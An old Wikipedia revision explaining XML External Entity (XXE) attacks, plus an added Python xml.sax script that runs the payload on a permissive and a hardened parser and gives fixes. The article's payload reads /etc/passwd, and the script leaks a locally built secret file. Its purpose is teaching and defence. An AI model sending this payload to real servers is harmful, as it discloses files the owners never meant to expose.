
XML external entity attack

From Wikipedia, the free encyclopedia

This is an old revision of this page, as edited by Royanee at 21:37, 14 August 2014 (Fix naming convention to match industry standards; reference OWASP's article).

An XML External Entity (XXE) attack[1] is a type of computer security vulnerability typically found in web applications. It occurs when XML input that declares an external entity is processed by a parser configured to resolve such entities; the attacker can use it to disclose files that are normally inaccessible from outside the server or its connected network.

The XML standard defines external general parsed entities (external entities): named entities whose replacement text lives at a URI given by a system identifier in the document's DTD. A parser that resolves external entities fetches that URI when it encounters a reference to the entity and substitutes the fetched content into the parsed document. Because the DTD is part of the input, an attacker who controls the document can therefore make the parser read an arbitrary local file or URL and return it as part of the document's content.

Example external entity attack (the entity xxeattack is declared with a SYSTEM identifier pointing at a local file and then referenced in the document body, so a parser that resolves external entities returns the contents of /etc/passwd inside the xxx element):

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ 
    <!ENTITY xxeattack SYSTEM "file:///etc/passwd"> 
]>
<xxx>&xxeattack;</xxx>
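The following is an added, runnable example (not from the article) that runs the same payload shape against Python's xml.sax parser twice: once with the external-entity feature switched on, which is how older Python versions behaved by default and how many XML parsers still behave, and once with it switched off, the hardened setting (and the xml.sax default since Python 3.7.1). Instead of /etc/passwd it reads a constructed secret file in a temporary directory so it runs anywhere; the file contents, the helper names and the `demo` function are the example's own assumptions.

```python
"""XXE demonstration against Python's xml.sax (added example, not from the article).

The payload follows the article's shape; the secret file and its contents
are constructed here so the script runs offline on any machine.
"""
import os
import tempfile
import xml.sax
import xml.sax.handler


class TextCollector(xml.sax.handler.ContentHandler):
    """Collect all character data the parser reports, including any text the
    parser substituted in place of an entity reference."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_collect_text(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse the document and return its character data as one string.

    resolve_external=True makes the parser fetch the SYSTEM identifier of an
    external general entity (the vulnerable configuration); False leaves the
    reference unexpanded (the hardened configuration).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.feed(xml_bytes)
    parser.close()
    return "".join(handler.chunks)


def xxe_payload(target_uri: str) -> bytes:
    """Build the article's payload with an attacker-chosen SYSTEM identifier."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE test [\n"
        f'    <!ENTITY xxeattack SYSTEM "{target_uri}">\n'
        "]>\n"
        "<xxx>&xxeattack;</xxx>\n"
    ).encode("utf-8")


def demo() -> dict:
    """Run the payload against a permissive and a hardened parser.

    Returns {"leaked": <text the permissive parser returned>,
             "blocked": <text the hardened parser returned>}.
    """
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for /etc/passwd: a file the attacker should not see.
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w", encoding="utf-8") as f:
            f.write("db_password=s3cr3t\n")

        payload = xxe_payload("file://" + secret_path)  # file:///tmp/.../secret.txt
        leaked = parse_collect_text(payload, resolve_external=True)
        blocked = parse_collect_text(payload, resolve_external=False)
    return {"leaked": leaked, "blocked": blocked}


if __name__ == "__main__":
    result = demo()
    print("external entities resolved :", repr(result["leaked"]))
    print("external entities disabled :", repr(result["blocked"]))
```

With resolution enabled the content of the secret file comes back as the text of the xxx element, exactly what the article describes; with it disabled the entity reference is dropped and the element is empty. The fix is a parser configuration, not input filtering: keep `feature_external_ges` off in xml.sax, use `resolve_entities=False` on an lxml `XMLParser`, or use the defusedxml wrappers, and where the application never needs a DTD, reject documents that carry a DOCTYPE at all.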
